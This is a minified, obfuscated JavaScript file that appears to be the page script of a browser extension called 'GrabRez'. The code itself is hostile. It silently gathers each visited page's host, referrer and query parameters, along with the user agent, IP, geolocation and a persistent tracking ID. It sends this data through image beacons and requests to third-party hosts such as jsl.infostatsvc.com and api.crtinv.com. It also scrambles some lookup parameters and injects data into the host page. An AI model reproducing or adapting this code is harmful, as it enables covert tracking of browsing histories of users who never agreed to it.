(function(){function A(a,b){if(a.constructor){var c=a.constructor.prototype[b],d=typeof c;if("function"==d||q&&9>q&&"object"==d)return function(){return c.apply(a,arguments)}}if(q&&8>q&&a===r)try{return eval(["(function () {delete ","; return ",";})()"].join(b))}catch(e){}return a[b]}function E(a){if(!F){F={};for(var b=r.location.search.substr(1).split("&"),c=0;c<b.length;c++){var d=b[c].split("=");F[decodeURIComponent(d[0])]=2==d.length?decodeURIComponent(d[1]):""}}return F[a]}function S(a){if("function"==
typeof T)return T(a);for(var b,c=0,d=sa,e="";a.charAt(c|0)||(d="=",c%1);e+=d.charAt(63&b>>8-c%1*8))b=b<<8|a.charCodeAt(c-=-0.75);return e}function x(a){for(var b="",c=0;c<a;c++)b+=ta.charAt(Math.floor(16*Math.random()));return b}function U(){return[x(8),x(4),x(4),x(4),x(12)].join("-")}function V(){var a=new Date,b=a.getUTCMonth()+1;return""+a.getUTCFullYear()+(9<b?"":"0")+b+a.getUTCDate()}function K(a){for(var b=[],c=0;c<a.length;c++)b.push(encodeURIComponent(a[c].toString().replace(/,/g,"$cma;")));
(new Image).src="https:"+ua+b.shift()+"="+b.join("|,|")}function va(){for(var a=0;a<W.length;a++){var b=W[a].exec(navigator.userAgent);if(b&&3==b.length)return b.splice(1,2)}return["Unknown","0"]}function wa(a,b){a.addEventListener?a.addEventListener("message",b,!1):a.attachEvent&&a.attachEvent("onmessage",b)}function B(a,b,c,d){var e=(new Date).valueOf(),f;if(!(d&&m>=xa&&e-N<ya))return d&&w(X,N=e),!q||9<q?(f=new XMLHttpRequest,f.onload=function(){d&&w(y,200==f.status?m=0:++m);"function"==typeof b&&
b.call(f)},f.open("GET",a),f.timeout=Y,f.send()):(f=new XDomainRequest,f.onload=function(){d&&w(y,m=0);"function"==typeof b&&b.call(f)},f.ontimeout=f.onerror=function(){d&&w(y,++m);"function"==typeof c&&c.call(f)},f.onprogress=function(){return za},f.timeout=Y,f.open("GET",a),C(function(){f.send()},0)),f}function n(a){try{return u.parse(localStorage.getItem(a))}catch(b){}}function w(a,b){try{localStorage.setItem(a,u.stringify(b))}catch(c){}}function Z(a){var b=(new Date).valueOf(),c="function"==typeof a,
d=$+"/gd2?r="+V();!k||b-k[s]>=k[G]?B(d,function(){k=u.parse(this.responseText);k[s]=b;w(aa,k);c&&a()},function(){c&&a()}):c&&a()}function ba(a){var b=(new Date).valueOf(),c="function"==typeof a,d=$+"/ga2?r="+V();!t||b-t[s]>=t[G]?B(d,function(){t=u.parse(this.responseText);t[s]=b;w(ca,t);c&&a()},function(){c&&a()}):c&&a()}function O(a,b,c){var d=(new Date).valueOf(),e="function"==typeof c;b=Aa+(a?"/uu?a="+encodeURIComponent(a)+"&e="+encodeURIComponent(b)+"&r=":"/gu?r=")+1E20*Math.random()+"&g="+encodeURIComponent(g);
a||!h||d-h[s]>=h[G]?B(b,function(){h=u.parse(this.responseText);h[s]=d;w(da,h);e&&c()},function(){e&&c()},!0):e&&c()}function P(a,b){var c=S(a),d=a.length,e=new Date;e.valueOf()-(l[s]||0)>=Ba&&(l={});var f=l[c];if(f)"function"==typeof b&&b(f);else if("function"==typeof b&&Q.push(b),"undefined"==typeof ea){for(var g=e.getUTCFullYear(),h=e.getUTCMonth(),k=e.getUTCDate(),g=[31,(g%4||!(g%100))&&g%400?28:29,31,30,31,30,31,31,30,31,30],p=0;p<h;p++)d+=g[p];ea=B("//api.crtinv.com/uchelper?l="+c+"&k="+S((d+
k).toString()),function(){try{var b=this.responseText,a=u.parse(b.substring(1,b.length-1));f={categories:[],isBadCategory:a[Ca],isBadUrl:a[Da]};l[s]||(l[s]=e.valueOf());for(p in a[Ea])f.categories.push(parseInt(p,10));l[c]=f;for(w(fa,l);Q.length;)Q.pop()(f)}catch(d){}})}}function ga(a,b,c,d){for(var e=0;e<c.length;e++)if(ha(a,c[e]))return!0;for(e=0;e<b.length;e++)if(ha(a,b[e]))return"undefined"!=typeof d&&d instanceof Array&&d.push(b[e][Fa]||0),!1;return!c.length||!!b.length}function ha(a,b){for(var c=
a.toLowerCase().split("."),d=b.domain.toLowerCase().split("."),e=!1;d.length;)for(var f=d.pop();c.length;){var g=c.pop();if(f==g){e||(e=!0);break}if(b.isTLD||e)return!1}return e}function Ga(a){var b=v.createElement("script");b.type="text/javascript";b.src="//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js";b.onload=b.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||"complete"==this.readyState){b.onload=b.onreadystatechange=null;b.parentNode.removeChild(b);try{"function"==
typeof a&&a()}catch(c){}}};(v.body||v.head).appendChild(b)}function ia(){function a(b){try{if(b.source==r.top){var a=b.data;"string"==typeof a&&(a=u.parse(a));"object"==typeof a&&a.ext==z&&("getcategory"==a.msg?P(p,function(a){a={ext:z,msg:"category",categoryData:a};r.top.postMessage(!q||9<q?a:u.stringify(a),b.origin||"*")}):"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&O(a.appid,a.state))}}catch(c){}}function b(){if(p&&k&&t){var b=t[ja]||0,n=k&&k[ja]||0,l=[],m=-1,L=new Date;
v.images&&(M||(K(["InitialPageVisit_2",I+"_"+z,g,p,n,b]),M=!0,w(ka,M)),!H||L.getUTCFullYear()>H.getUTCFullYear()||L.getUTCMonth()>H.getUTCMonth()||L.getUTCDate()>H.getUTCDate())&&(K(["DailyActiveExtensionUser_4",I,z,s,D||"",g,n,b].concat(G)),H=L,w(B,H.valueOf()));h&&(d=h.user||{},la||(la=!0,d.apps[ma]&&d.apps[ma].enabled&&P(p,function(a){for(a=a.categories.slice(0,5);5>a.length;)a.push("");K(["PanelPageVisit_4",z,g,f,L.valueOf(),E("n").substr(0,1E3),E("t").substr(0,1E3),x.substr(0,4E3),E("r").substr(0,
4E3),n,b].concat(a,G,I,h[na].countryCode))})));if(ga(p,k.blacklistedDomains||[],[],l))oa||(oa=!0,K(["PageVisitCounter_1",I+"_"+z,g])),0.1>Math.random()&&P(p,function(a){for(a=a.categories.slice(0,5);5>a.length;)a.push("");K(["PageVisit_2",I+"_"+z,g,F,n,b].concat(a))});else for(;l.length;)m&=l.pop();for(var l=t.appsWithSettings||[],y=0;y<l.length;y++){var J=l[y],C=J[Ha]||-1,A=d.apps[J.id];A&&A.enabled&&(C&m)==C&&ga(p,J.blacklistDomains,J.whitelistDomains)&&(J.customSettings.bitFlags=A.bitFlags,e.push(J))}wa(r,
a);m={ext:z,msg:"userdata",installSource:D,ip:h[Ia],geo:h[na],bucketId:d[Ja],token:f,appData:e};r.top.postMessage(!q||9<q?m:u.stringify(m),c.protocol+"//"+c.hostname+(80!=c.port&&443!=c.port?":"+c.port:""))}}g=localStorage.getItem(pa);D=localStorage.getItem(qa);M=n(ka);k=n(aa);t=n(ca);h=n(da);l=n(fa)||{};N=n(X)||0;m=n(y)||0;var c=v.createElement("a");c.href=v.referrer;A(r,"setInterval");var d={},e=[],f=U(),s="https:"==c.protocol,x=v.referrer,F=x.substr(0,2E3),p=c.hostname,B=s?Ka:La,H=new Date(n(B)||
0),G=va();g&&ra.test(g)||(g=E("g"),g&&ra.test(g)||(g=U(),D="thin"),localStorage.setItem(pa,g));D||(D=E("is"),localStorage.setItem(qa,D));I=E("bp")||"BF";k&&t&&h?b():(k||Z(b),t||ba(b),h||O(null,null,b));C(function(){Z()},R);C(function(){ba()},R);C(function(){O()},R)}var r=window,v=document,u,q=!1,F,sa="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",z="GrabRez",Aa="//api.grabmyrez.co",$="//apigrabmyrezco-a.akamaihd.net",Ba=6048E5,Y=5E3,xa=3,R=
3E4,ya=9E5,pa="ug",qa="is",ka="irl",La="aul",Ka="asul",aa="platform_blacklist",Fa="aat",ca="app_data",Ha="t",da="user_state",Ia="ip",Ja="bucketId",na="geo",G="cacheTimeMS",ja="serverTimestamp",s="timestamp",fa="categories",Ea="uc",Ca="hc",Da="bu",X="xhr_timestamp",y="xhr_fail_count",ma=1015,ua="//jsl.infostatsvc.com/?",I,g,D,M=!1,k,t,h,l,Q=[],ea,la=!1,oa=!1,N,m,C=A(r,"setTimeout"),T=A(r,"btoa"),za="foo",ta="0123456789abcdef",ra=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i,W=[/\b(opr)\/([\d\.]+)\b/i,
/\b(lunascape)[\/ ]([\d\.]+)\b/i,/\b(maxthon)\/([\d\.]+)\b/i,/\b(chrome)\/([\d\.]+)\b/i,/\b(msie)\s([\d\.]+)\b/i,/\b(trident)\/([\d\.]+)\b/i,/\b(firefox)\/([\d\.]+)\b/i,/\b(safari)\/([\d\.]+)\b/i,/\b(opera)\/([\d\.]+)\b/i];(function(){var a=v.documentMode,b;try{delete v.documentMode,b=v.documentMode,v.documentMode=a}catch(c){}"number"==typeof b?q=b:"number"==typeof a&&(q=a);var d=r.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(u=d,ia()):Ga(function(){u=r.JSON;
"undefined"!=typeof d&&(r.JSON=d);ia()})})()})();